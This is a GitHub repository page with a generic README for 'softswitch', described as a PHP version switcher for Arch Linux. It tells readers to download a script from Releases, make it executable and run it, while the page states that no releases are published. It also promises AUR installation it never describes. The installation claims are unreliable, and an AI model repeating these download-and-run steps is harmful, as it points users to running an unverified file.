Skip to content

πŸ”„ Switch between installed PHP versions on Arch Linux easily and quickly with this simple CLI tool.

License

Notifications You must be signed in to change notification settings

ibrasalman/softswitch

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

9 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🌟 softswitch - Effortlessly Manage PHP Versions on Arch Linux

πŸ“₯ Download Now

Download softswitch

πŸš€ Getting Started

Welcome to softswitch! This application lets you easily switch between different PHP versions on your Arch Linux system using the command line. Below, you will find clear and simple steps to download and run softswitch.

πŸ“‹ System Requirements

  • Arch Linux Operating System
  • Command-line access
  • Basic knowledge of terminal commands

πŸ“‚ Features

  • Easily switch between multiple PHP versions.
  • Simple command-line interface suitable for all users.
  • Quick installation process through the Arch User Repository (AUR).

πŸ”— Download & Install

To get started, you need to visit the Releases page to download the softswitch application.

  1. Click the link below to access the Releases page: Download softswitch from GitHub Releases

  2. On the Releases page, look for the latest version. You will see a list of available files.

  3. Click on the appropriate file to download it.

  4. Once the download is complete, navigate to your terminal.

  5. Change to the directory where the file was downloaded. Use the cd command followed by the path to the download folder. For example:

    cd ~/Downloads
    
  6. Make the downloaded file executable. Run the following command:

    chmod +x softswitch-*.sh
    
  7. Now you can run softswitch by executing:

    ./softswitch-*.sh
    

πŸ”§ Using softswitch

After installation, you can start using softswitch to manage PHP versions:

  1. To check available PHP versions, run:

    softswitch list
    
  2. To switch to a specific version, use:

    softswitch use <version>
    

    Replace <version> with the version number you want to switch to, such as 7.4 or 8.0.

  3. To verify the active PHP version, run:

    php -v
    

πŸ“š Additional Information

For further details about softswitch, please refer to the GitHub repository documentation. You may find helpful tips and troubleshooting information.

If you encounter any issues, consider checking community forums or reaching out for help.

πŸ’¬ Support

For questions or support regarding softswitch, feel free to open an issue in the GitHub repository. The community is here to help you.

🌐 Communities

  • Arch Linux Forums
  • PHP User Groups on social media platforms
  • Development communities focused on Bash scripting and command-line tools

By following these steps, you can easily download and manage PHP versions on your system using softswitch. Enjoy seamless development with the best PHP tools at your fingertips.

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages